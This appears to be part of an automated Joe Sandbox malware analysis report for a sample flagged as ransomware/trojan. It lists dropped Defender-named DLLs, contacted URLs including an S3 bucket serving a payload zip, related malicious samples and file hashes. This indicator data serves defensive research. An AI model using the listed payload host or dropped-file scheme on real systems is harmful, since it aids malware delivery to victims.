C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll	0%	Virustotal	Browse
C:\Program Files (x86)\Microsoft.NET\MpClient.dll	12%	Virustotal	Browse
C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll	3%	Virustotal	Browse
C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe	0%	Virustotal	Browse
C:\Program Files (x86)\Microsoft.NET\MpCommu.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpCommu.dll	0%	Virustotal	Browse
C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe	0%	Virustotal	Browse
C:\Program Files (x86)\Microsoft.NET\MpDetours.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpDetours.dll	0%	Virustotal	Browse
C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll	0%	Virustotal	Browse
C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe	0%	Virustotal	Browse
C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll	0%	Virustotal	Browse
C:\Program Files (x86)\Microsoft.NET\MpOAV.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpOAV.dll	0%	Virustotal	Browse

Source	Detection	Scanner	Label	Link
http://defaultcontainer/tempfiles/sample.diff	0%	Avira URL Cloud	safe
http://defaultcontainer/lib/net48/vmware-authd.exe	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.bsdiff	0%	Avira URL Cloud	safe
http://defaultcontainer/lib/net48/vcruntime140.dll	0%	Avira URL Cloud	safe
http://defaultcontainer/DefMeta.nuspec	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.nuspec	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.exe	0%	Avira URL Cloud	safe
http://defaultcontainer/package/services/metadata/core-properties/f2fc7b50a1cb43c08c289558008b7a8a.p	0%	Avira URL Cloud	safe
https://unitedstates4.ss.wd.microsoft.usffl4unknownUriunsupportedserverCalluserActionhttps://europe.	0%	Avira URL Cloud	safe
http://defaultcontainer/_rels/.rels	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.dll	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.rels	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.shasum	0%	Avira URL Cloud	safe
http://defaultcontainer/lib/net48/vmwarebase.dll	0%	Avira URL Cloud	safe
http://canonicalizer.ucsuri.tcs/68007400740070003a002f002f00https://bad	0%	Avira URL Cloud	safe
http://schemas.openxmlformats.or	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.psmdcp	0%	Avira URL Cloud	safe
https://unitedstates4.ss.wd.microsoft.us	0%	Avira URL Cloud	safe
https://unitedstates1.ss.wd.microsoft.us	0%	Avira URL Cloud	safe
https://unitedstates1.ss.wd.microsoft.us	1%	Virustotal		Browse
https://unitedstates4.ss.wd.microsoft.us	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s3-r-w.sa-east-1.amazonaws.com	3.5.232.185	true	false		high
special-edition32093201.s3.sa-east-1.amazonaws.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.zip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/myuser/myrepo	Update.exe	false		high
http://defaultcontainer/tempfiles/sample.bsdiff	Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.zipf	vmware-authd.exe, 00000008.00000003.2108819173.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2110976045.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107109507.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2111653253.00000000030B9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	ThirdPartyNotices.txt.8.dr	false		high
http://www.vmware.com/0	Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	false		high
http://defaultcontainer/lib/net48/vcruntime140.dll	Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	MpCommu.dll.8.dr	false		high
https://special-edition32093201.s3.sa-east-1.amazonaws.com/C	vmware-authd.exe, 00000008.00000003.2108854598.000000000304E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2112499057.000000000304E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120322191.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000002.3263091725.000000000304D000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121275803.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2117823557.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115939795.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107217328.000000000304C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://defaultcontainer/lib/net48/vmware-authd.exe	Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://defaultcontainer/DefMeta.nuspec	Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.0000000003285000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.0000000003172000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://defaultcontainer/tempfiles/sample.diff	Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://defaultcontainer/tempfiles/sample.nuspec	Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://aka.ms/NpFeedbackunknownA	MpSvc.dll.8.dr	false		high
https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.zipu	vmware-authd.exe, 00000008.00000002.3263091725.000000000302E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.vmware.com/0/	Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	false		high
https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.zipt	vmware-authd.exe, 00000008.00000003.2117689030.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2108819173.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115740534.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121078090.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2110976045.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2114726725.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107109507.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115002407.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2111653253.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120194531.00000000030B2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.github.com/#	Update.exe	false		high
http://defaultcontainer/tempfiles/sample.exe	Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://defaultcontainer/package/services/metadata/core-properties/f2fc7b50a1cb43c08c289558008b7a8a.p	Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.0000000003285000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.0000000003172000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://github.com/Microsoft/cpprestsdk.	ThirdPartyNotices.txt.8.dr	false		high
https://special-edition32093201.s3.sa-east-1.amazonaws.com/	vmware-authd.exe, 00000008.00000003.2108854598.000000000304E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2112499057.000000000304E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120322191.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000002.3263091725.000000000304D000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121275803.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2117823557.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115939795.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107217328.000000000304C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.ziph	vmware-authd.exe, 00000008.00000002.3263091725.000000000302E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.zipUUC:	vmware-authd.exe, 00000008.00000003.2108854598.000000000304E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2112499057.000000000304E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120322191.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121275803.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2117823557.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115939795.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107217328.000000000304C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://unitedstates4.ss.wd.microsoft.usffl4unknownUriunsupportedserverCalluserActionhttps://europe.	NisSrv.exe.8.dr	false	Avira URL Cloud: safe	unknown
http://defaultcontainer/_rels/.rels	Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://defaultcontainer/tempfiles/sample.dll	Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://defaultcontainer/tempfiles/sample.rels	Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://github.com/Microsoft/cpprestsdk/blob/master/license.txt)	ThirdPartyNotices.txt.8.dr	false		high
http://defaultcontainer/tempfiles/sample.shasum	Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://aka.ms/NpBhFeedbackSinkholeMalicious-	MpSvc.dll.8.dr	false		high
https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.zipC:	vmware-authd.exe, 00000008.00000003.2108819173.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2092316872.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115740534.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2110976045.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2114726725.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107109507.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115002407.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2111653253.00000000030B9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://canonicalizer.ucsuri.tcs/68007400740070003a002f002f00https://bad	NisSrv.exe.8.dr	false	Avira URL Cloud: safe	unknown
http://defaultcontainer/lib/net48/vmwarebase.dll	Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	MpCommu.dll.8.dr	false		high
http://schemas.openxmlformats.or	Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://defaultcontainer/tempfiles/sample.psmdcp	Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.zipL	vmware-authd.exe, 00000008.00000003.2117689030.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2108819173.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2092316872.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115740534.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121078090.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2110976045.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2114726725.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107109507.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115002407.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2111653253.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120194531.00000000030B2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://unitedstates4.ss.wd.microsoft.us	NisSrv.exe.8.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest	MpCommu.dll.8.dr	false		high
https://unitedstates1.ss.wd.microsoft.us	NisSrv.exe.8.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
3.5.232.185	s3-r-w.sa-east-1.amazonaws.com	United States		16509	AMAZON-02US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1393492
Start date and time:	2024-02-16 14:29:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0923840932020004-3-0.exe
Detection:	MAL
Classification:	mal80.rans.troj.evad.winEXE@19/76@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 62% Number of executed functions: 266 Number of non-executed functions: 91
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Update.exe, PID 4432 because it is empty
Execution Graph export aborted for target vmware-authd.exe, PID 7208 because there are no executed function
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s3-r-w.sa-east-1.amazonaws.com	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse	52.95.163.114
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse	16.12.0.34
	DOC7186723912#U0370.msi	Get hash	malicious	Hidden Macro 4.0	Browse	52.95.164.60
	DOC0974045396#U0370.msi	Get hash	malicious	Hidden Macro 4.0	Browse	52.95.164.98
	file.msi	Get hash	malicious	Hidden Macro 4.0	Browse	52.95.164.11
	F#U00b498074756.msi	Get hash	malicious	Hidden Macro 4.0	Browse	52.95.164.122
	https://dismelo.com.br	Get hash	malicious	Unknown	Browse	16.12.0.2
	nQ6U1S5Anw.exe	Get hash	malicious	Unknown	Browse	16.12.2.46
	S-432.exe	Get hash	malicious	Unknown	Browse	52.95.164.7
	MAFR-GVK-.exe	Get hash	malicious	Unknown	Browse	52.95.165.11

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	brT2G5rS34.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	https://app.capacities.io/home/ce876d3c-88be-4b07-96a6-d590700e733d	Get hash	malicious	Unknown	Browse	13.225.214.81
	rBancofiecompro.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	44.227.76.166
	L8XJ1ebA2Q.elf	Get hash	malicious	Mirai	Browse	54.247.62.1
	http://beinggiant.com	Get hash	malicious	Unknown	Browse	76.76.21.21
	http://search.pdf2docs.com	Get hash	malicious	Unknown	Browse	13.225.63.96
	TC4ShellHost.64.exe	Get hash	malicious	Unknown	Browse	52.85.61.41
	TC4ShellHost.64.exe	Get hash	malicious	Unknown	Browse	52.85.61.41
	TC4ShellHost.64.exe	Get hash	malicious	Unknown	Browse	52.85.61.113
	file.exe	Get hash	malicious	RisePro Stealer	Browse	18.238.49.94

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Facttur525252525252.lnk	Get hash	malicious	Unknown	Browse	3.5.232.185
	RYRPNPGF.JS.js	Get hash	malicious	Unknown	Browse	3.5.232.185
	RYRPNPGF.JS.js	Get hash	malicious	Unknown	Browse	3.5.232.185
	NWf8Xj9cR4.dll	Get hash	malicious	CobaltStrike	Browse	3.5.232.185
	plKyZT117U.dll	Get hash	malicious	CobaltStrike	Browse	3.5.232.185
	SecuriteInfo.com.Win32.Evo-gen.10682.26428.exe	Get hash	malicious	Unknown	Browse	3.5.232.185
	https://landofmedicine.com/zfacturass.php	Get hash	malicious	Unknown	Browse	3.5.232.185
	SecuriteInfo.com.Win32.Evo-gen.10682.26428.exe	Get hash	malicious	Unknown	Browse	3.5.232.185
	PO20152024.scr.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	3.5.232.185
	reports_02.15.2024_2.js	Get hash	malicious	Unknown	Browse	3.5.232.185

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse
C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse
C:\Program Files (x86)\Microsoft.NET\EppManifest.dll	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse
C:\Program Files (x86)\Microsoft.NET\EppManifest.dll	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse
C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse
C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	214352
Entropy (8bit):	6.043733758501481
Encrypted:	false
SSDEEP:	3072:wC3HjG5Tg1HlnGEx6s8Pt0TOAsdPgrjnKRKisSNm50i+B5KTedUQqm1FpCShisD:wC3OTg1AExYWCA4PeTKRKiRc5MT1vh
MD5:	573FA5E140E6B7C6209B546511DD0989
SHA1:	28BEFE7EF26AE909FEB74AC4A8C9981BED192A93
SHA-256:	BA543F2CF16CB1D1CFA87D7531E6045581EE76274C36D0C9DF8C131E05B86977
SHA-512:	6E43E60743207E0C50B42BAAAF0DE71F544B579292F7907360BE0926C56C74D06CAA4E7BC0ABF5AA857400D8A573BF820905F0B9283C26EE5CD2E0E3320736BF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... )L.dH".dH".dH"./0!.`H"./0&.pH".dH#..I"./0#.EH"./0'.nH"./0".eH"./0*.=H"./0..eH"./0 .eH".RichdH".........PE..d...u.W.........." ......... ...............................................0......9.....`A...................................................@...............x.... ..P%... ..4....Y..p....................'..(....%..@...........8'...............................text...y........................... ..`.rdata..............................@..@.data...............................@....pdata..x........ ..................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\AmMonitoringInstall.mof

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	C source, ASCII text, with very long lines (769), with CRLF line terminators
Category:	dropped
Size (bytes):	9398
Entropy (8bit):	4.899071819784544
Encrypted:	false
SSDEEP:	192:0kJH/0e6Y/WnPqLO0OKcie0lmkLgJsJ+LjtU+J3I:FBf6Yyf09MnkEeAu
MD5:	1FC6F870588FEF1B38BA900026BE8828
SHA1:	6075BC55198D9A0D75A4D7DB20B7B2D8AD47A466
SHA-256:	A24DD47738189CA55A5137A49FD1246418BC1C589A4294B79DFCC4D2A79C9098
SHA-512:	530A02081ECFBAB6AB59C904874C604263975174626980BFE445371540E999754A2DD204A003D79C8F7E5FF1D5C420E2CB93BF36B527DFBF774638FE923B62D8
Malicious:	false
Reputation:	low
Preview:	// AmMonitoringInstall.mof : mof source for Malware class..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// register the provider with the WMI repository...//....#pragma autorecover....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....////////////////////////////////////////////////////////..// Declare WMI class : Malware..////////////////////////////////////////////////////////....[.. Description("Describes malware detected by Forefront Antimalware"): ToInstance ToSubClass, .. dynamic: DisableOverride ToInstance,.. provider("AntimalwareMonitoringProvider"): ToInstance ToSubClass..]..class Malware: SerializableToXml..{.. string SchemaVersion = "1.0.0.0"; // derived from SerializableToXml.. .. [.. Description("Detection time in the Round-Trip Format"): ToInstance ToSubClass, .. read: ToInstance ToSubClass.. ].. string DetectionTime;.. .. [.. Desc

C:\Program Files (x86)\Microsoft.NET\AmStatusInstall.mof

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	C source, ASCII text, with very long lines (769), with CRLF line terminators
Category:	dropped
Size (bytes):	21004
Entropy (8bit):	4.9286194529785705
Encrypted:	false
SSDEEP:	192:HMVlF4ajQGgTGB6r+WApyLaNFeRUTqp1CljVU2kplI5NLO060YeVwa6wplCSJddn:YD4cQGgyBV7clIi0JFMSvG4k+
MD5:	EAA6FC46125F59D04BCBB6122817B41E
SHA1:	72436F84D76486D2D1F824E6BC0D3BD47D1CB2E7
SHA-256:	67191020D74AE8400F875238E494AAF5D28EEFEC7EFE1D1D20D2DB068D5E35D6
SHA-512:	77F7DE790509CEE5D288CE9DAFB3D100E9DB8F343D5D8380E1B0EDC441D3CC0666C8ECF30DE7910FA701A54C62897ACC169F46885AEEC02B78FC1BA91FE07A80
Malicious:	false
Preview:	// AmStatusInstall.mof : mof source for Antimalware Status provider..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// register the provider with the WMI repository..//....#pragma autorecover....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....////////////////////////////////////////////////////////..// Declare class : AntimalwareHealthStatus..////////////////////////////////////////////////////////..[.. provider("AntimalwareHealthStatusProv"): ToInstance ToSubClass, .. singleton: DisableOverride ToInstance ToSubClass, .. dynamic: DisableOverride ToInstance, .. Description("This is a singleton that represents the Microsoft Antimalware service status"): ToInstance ToSubClass..]..class AntimalwareHealthStatus: ProtectionTechnologyStatus..{.. string SchemaVersion = "1.0.0.1"; // derived from SerializableToXml.... string Name = "Antimalware"; // derived from ProtectionTechnologySta

C:\Program Files (x86)\Microsoft.NET\ClientWMIInstall.mof

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	C source, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2460
Entropy (8bit):	4.767342366558364
Encrypted:	false
SSDEEP:	48:FiDRPfReZei3Q9Cf9haZCX0doQkAvVTIUH9:8Db2V3Q9CFhaZCX0doXAvVTIUH9
MD5:	6FE3967E8035358D369C83FA72400006
SHA1:	A2F9F0D1667431185B3E4E74ED47EDB9CF76A2F9
SHA-256:	29EFFB537FBC7C0CF869E61BFA5262CF7A7301604298E44373A637585C3504C7
SHA-512:	0C31F1A0E111A918C763AB30EA9BF2E889BEFDE1A63AA8511F5DC11D7D3C48AA1B25F27513881E32C4E22598BA648958D67B10B7221CAF863DEFD17657A28A02
Malicious:	false
